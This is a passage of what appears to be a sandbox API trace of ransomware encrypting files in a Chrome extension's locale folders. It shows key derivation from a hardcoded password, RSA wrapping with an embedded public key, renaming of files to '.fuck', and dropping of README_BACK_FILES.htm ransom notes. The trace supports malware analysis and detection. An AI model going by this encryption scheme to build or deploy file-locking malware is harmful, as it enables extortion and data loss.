pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.630] CryptEncrypt (in: hKey=0x29381b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293f7f0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293f7f0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.630] WriteFile (in: hFile=0x5d58, lpBuffer=0x293f7f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293f7f0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.632] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe1, lpOverlapped=0x0) returned 1 [0249.633] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe1, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0249.633] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0249.633] CloseHandle (hObject=0x5d5c) returned 1 [0249.633] CloseHandle (hObject=0x5d58) returned 1 [0249.633] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json"), bFailIfExists=0) returned 1 [0249.637] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json", dwFileAttributes=0x0) returned 1 [0249.637] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.gsg")) returned 1 [0249.638] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.fuck")) returned 1 [0249.639] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.639] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.639] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.639] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.639] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.639] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\readme_back_files.htm")) returned 0xffffffff [0249.640] AreFileApisANSI () returned 1 [0249.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.640] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.640] GetFileType (hFile=0x5d54) returned 0x1 [0249.640] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.642] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.642] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.642] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.642] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.642] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.642] GetLastError () returned 0x0 [0249.643] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json")) returned 0x20 [0249.643] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x80) returned 1 [0249.643] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.644] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.644] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.645] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.669] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.669] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.669] CryptHashData (hHash=0x2938978, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.669] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.669] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.669] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.670] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293fa10) returned 1 [0249.670] CryptImportPublicKeyInfo (in: hCryptProv=0x293fa10, dwCertEncodingType=0x1, pInfo=0x2932ba0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932bd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932bd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937d38) returned 1 [0249.670] CryptEncrypt (in: hKey=0x2937d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.670] CryptEncrypt (in: hKey=0x2937d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2940290*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2940290*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.670] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2940290*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2940290*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.672] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xce, lpOverlapped=0x0) returned 1 [0249.673] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xce, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0249.673] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0249.673] CloseHandle (hObject=0x5d58) returned 1 [0249.674] CloseHandle (hObject=0x5d5c) returned 1 [0249.674] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json"), bFailIfExists=0) returned 1 [0249.677] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x0) returned 1 [0249.679] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json.gsg")) returned 1 [0249.680] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json.fuck")) returned 1 [0249.681] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.681] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.681] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.681] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.681] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.682] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\readme_back_files.htm")) returned 0xffffffff [0249.682] AreFileApisANSI () returned 1 [0249.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0249.682] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.683] GetFileType (hFile=0x5d54) returned 0x1 [0249.683] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.684] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.684] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.684] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.684] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.685] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.685] GetLastError () returned 0x0 [0249.685] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json")) returned 0x20 [0249.685] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x80) returned 1 [0249.685] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.686] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.688] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.689] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.711] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.711] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.711] CryptHashData (hHash=0x2938978, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.711] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.711] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.711] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.711] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29404b0) returned 1 [0249.711] CryptImportPublicKeyInfo (in: hCryptProv=0x29404b0, dwCertEncodingType=0x1, pInfo=0x2932d40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932d70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932d78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937df8) returned 1 [0249.712] CryptEncrypt (in: hKey=0x2937df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.712] CryptEncrypt (in: hKey=0x2937df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2940428*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2940428*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.712] WriteFile (in: hFile=0x5d58, lpBuffer=0x2940428*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2940428*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.713] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xce, lpOverlapped=0x0) returned 1 [0249.714] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xce, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0249.714] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0249.714] CloseHandle (hObject=0x5d5c) returned 1 [0249.714] CloseHandle (hObject=0x5d58) returned 1 [0249.715] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json"), bFailIfExists=0) returned 1 [0249.718] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x0) returned 1 [0249.719] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json.gsg")) returned 1 [0249.720] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json.fuck")) returned 1 [0249.721] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.721] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.721] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.721] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.722] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.722] 